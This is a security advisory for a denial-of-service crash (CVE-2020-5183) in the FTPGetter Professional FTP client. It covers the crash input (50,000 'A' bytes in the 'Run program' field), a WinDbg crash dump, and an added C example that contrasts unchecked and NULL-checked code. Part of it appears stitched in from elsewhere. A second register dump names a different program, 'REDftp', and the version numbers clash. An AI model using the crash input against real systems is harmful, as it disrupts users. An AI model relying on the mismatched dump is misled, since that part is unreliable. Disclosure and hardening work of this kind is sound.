# Exploit Title: FTPGetter Professional 5.97.0.223 - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-01-03
# Exploit Author: FULLSHADE
# Vendor Homepage: https://www.ftpgetter.com/
# Software Link: https://www.ftpgetter.com/ftpgetter_pro_setup.exe
# Version: v.5.97.0.223
# Tested on: Windows 7
# CVE : N/A

==================================================================
THE BUG : NULL pointer dereference -> DOS crash
==================================================================

The FTPGetter Professional v.5.97.0.223 FTP client suffers from a NULL
pointer dereference vulnerability: the program does not properly handle
user input supplied in the "Run program" field under profile properties,
and the crash triggers when the profile is executed.

==================================================================
DISCLOSURE :
Vendor contacted :
MITRE assignment : CVE-2020-5183
==================================================================
...
...
==================================================================
WINDBG ANALYSIS AFTER SENDING 50,000 'A' BYTES
==================================================================

(b84.e88): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0255d3a0 ecx=04000000 edx=00000030 esi=00000000 edi=00000001
eip=00855994 esp=0012fbd0 ebp=0012fc6c iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for FTPGetter.exe -
FTPGetter!Xtermforminitialization$qqrv+0x202d74:
00855994 8b5004          mov     edx,dword ptr [eax+4] ds:0023:00000004=????????

0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for ftpgcore.dll -
Failed calling InternetOpenUrl, GLE=12007

FAULTING_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004          mov     edx,dword ptr [eax+4]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00855994 (FTPGetter!Xtermforminitialization$qqrv+0x00202d74)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000004
Attempt to read from address 00000004

FAULTING_THREAD:  00000e88

PROCESS_NAME:  FTPGetter.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000000

EXCEPTION_PARAMETER2:  00000004

READ_ADDRESS:  00000004

FOLLOWUP_IP:
FTPGetter!Xtermforminitialization$qqrv+202d74
00855994 8b5004          mov     edx,dword ptr [eax+4]

MOD_LIST:

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

BUGCHECK_STR:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ

PRIMARY_PROBLEM_CLASS:  NULL_CLASS_PTR_DEREFERENCE

DEFAULT_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE

LAST_CONTROL_TRANSFER:  from 00812591 to 00855994

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be wrong.
0012fc6c 00812591 0085d350 0085d355 0046d181 FTPGetter!Xtermforminitialization$qqrv+0x202d74
0012fc8c 0079ffc1 0012fd24 00000000 007a15c2 FTPGetter!Xtermforminitialization$qqrv+0x1bf971
0012fcf8 007a2780 0012fdc8 007a278a 0012fd1c FTPGetter!Xtermforminitialization$qqrv+0x14d3a1
0012fd1c 0068fda6 00000111 00000030 00000000 FTPGetter!Xtermforminitialization$qqrv+0x14fb60
0012fd34 7688c267 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x3d186
0012fd60 7688c367 00250f60 001f0320 00000111 user32!InternalCallWinProc+0x23
0012fdd8 7688c999 00000000 00250f60 001f0320 user32!UserCallWinProcCheckWow+0x14b
0012fe38 7688c9f0 00250f60 00000000 001f0320 user32!DispatchMessageWorker+0x357
0012fe48 007dec94 0012fe6c 00120100 0012feb8 user32!DispatchMessageW+0xf
0012fe64 007decd7 001f0320 00000111 00000030 FTPGetter!Xtermforminitialization$qqrv+0x18c074
0012fe88 007df016 0012fe9c 007df020 0012feb8 FTPGetter!Xtermforminitialization$qqrv+0x18c0b7
0012feb8 00404674 00000000 00e75048 015c26bb FTPGetter!Xtermforminitialization$qqrv+0x18c3f6
0012ff50 00aeae2b 00400000 00000000 015c26bb FTPGetter!_GetExceptDLLinfo+0x112f
0012ff88 7509ef3c 7ffdc000 0012ffd4 77003688 FTPGetter!madTraceProcess+0x3cef7
0012ff94 77003688 7ffdc000 7702d7f0 00000000 kernel32!BaseThreadInitThunk+0xe
0012ffd4 7700365b 004034ec 7ffdc000 00000000 ntdll!__RtlUserThreadStart+0x70
0012ffec 00000000 004034ec 7ffdc000 00000000 ntdll!_RtlUserThreadStart+0x1b

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  ftpgetter!Xtermforminitialization$qqrv+202d74

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: FTPGetter

IMAGE_NAME:  FTPGetter.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  5dffa0bd

STACK_COMMAND:  dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s ; kb

FAILURE_BUCKET_ID:  NULL_CLASS_PTR_DEREFERENCE_c0000005_FTPGetter.exe!Xtermforminitialization$qqrv

BUCKET_ID:  APPLICATION_FAULT_NULL_CLASS_PTR_DEREFERENCE_NULL_POINTER_READ_INVALID_POINTER_READ_ftpgetter!Xtermforminitialization$qqrv+202d74

WATSON_STAGEONE_URL:  http://watson.microsoft.com/StageOne/FTPGetter_exe/5_97_0_221/5dffa0bd/FTPGetter_exe/5_97_0_221/5dffa0bd/c0000005/00455994.htm?Retriage=1

Followup: MachineOwner
---------

NULL pointer

FOLLOWUP_IP:
REDftp!Xtermforminitialization$qqrv+202d74
00855994 8b5004          mov     edx,dword ptr [eax+4]

Stepping into and running:

eax=04e8fc78 ebx=004db6b4 ecx=0000000a edx=41414141 esi=02871ae0 edi=00000000
eip=004db97a esp=04e8fc74 ebp=04e8fec0 iopl=0         nv up ei pl nz ac pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
REDftp!GetFTPValidationW+0x6e842:
004db97a 837a5400        cmp     dword ptr [edx+54h],0 ds:0023:41414195=????????

==================================================================
CVE-2020-5183 is a NULL pointer dereference vulnerability
==================================================================
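The fault class in the dump (a read at address 00000004, i.e. a member at offset 4 of a NULL object pointer) is the classic result of using a lookup or constructor result without checking it. The C program below is an added illustration of that pattern and of the fix; it is not code from the advisory and not FTPGetter's code. The profile_t layout, the RUN_PROGRAM_MAX limit and every function name are assumptions chosen for the illustration; the only thing taken from the advisory is the idea of an oversized "Run program" value (the 50,000 'A' bytes) that the program must reject without dereferencing a NULL pointer.

```c
#include <stdlib.h>
#include <string.h>

/* Hypothetical profile object (NOT FTPGetter's real layout).  On a 32-bit
 * build run_program lands at offset 4, the same offset as the failing read
 * "mov edx,dword ptr [eax+4]" in the advisory's crash dump. */
typedef struct profile {
    int   id;
    char *run_program;
} profile_t;

/* Assumed upper bound for the "Run program" value (MAX_PATH-sized). */
#define RUN_PROGRAM_MAX 260

/* Builds a profile from user input.  Returns NULL when the input is rejected
 * (missing, oversized, or allocation failure).  A NULL return is the normal,
 * expected outcome for an input like the advisory's 50,000-byte string. */
profile_t *profile_create(int id, const char *run_program)
{
    if (run_program == NULL)
        return NULL;
    size_t len = strlen(run_program);
    if (len >= RUN_PROGRAM_MAX)
        return NULL;                        /* oversized "Run program" rejected */

    profile_t *p = malloc(sizeof *p);
    if (p == NULL)
        return NULL;
    p->id = id;
    p->run_program = malloc(len + 1);
    if (p->run_program == NULL) {
        free(p);
        return NULL;
    }
    memcpy(p->run_program, run_program, len + 1);
    return p;
}

void profile_destroy(profile_t *p)
{
    if (p != NULL) {
        free(p->run_program);
        free(p);
    }
}

/* Unchecked pattern: the NULL from profile_create() is dereferenced at
 * offset 4, the same class of fault as the dump's read of address 00000004
 * with eax=0.  Shown for contrast only; it crashes on rejected input. */
int run_profile_unchecked(int id, const char *run_program)
{
    profile_t *p = profile_create(id, run_program);
    int len = (int)strlen(p->run_program);  /* p may be NULL here */
    profile_destroy(p);
    return len;
}

/* Hardened pattern: the constructor result is checked before any field is
 * touched, and the rejection is reported to the caller as an error code. */
int run_profile_checked(int id, const char *run_program, int *out_len)
{
    profile_t *p = profile_create(id, run_program);
    if (p == NULL)
        return -1;                          /* invalid profile: refuse to run */
    *out_len = (int)strlen(p->run_program);
    profile_destroy(p);
    return 0;
}

/* Constructed test input: n bytes of 'A', mirroring the advisory's test
 * string.  Returns the checked runner's status so behaviour on oversized
 * input can be verified without a crash. */
int run_profile_with_a_bytes(size_t n, int *out_len)
{
    char *buf = malloc(n + 1);
    if (buf == NULL)
        return -2;
    memset(buf, 'A', n);
    buf[n] = '\0';
    int rc = run_profile_checked(1, buf, out_len);
    free(buf);
    return rc;
}

int main(void)
{
    int len = 0;
    int rc = run_profile_with_a_bytes(50000, &len);
    return rc == -1 ? 0 : 1;   /* exit 0 when the oversized input was rejected */
}
```

The check that matters is the one in run_profile_checked: an input-validation limit alone is not enough, because whatever function hands back the profile object can also fail for reasons unrelated to length, and every caller that touches a field at offset 4 (or 0x54, as in the second register dump) has to treat a NULL result as an error rather than as an object.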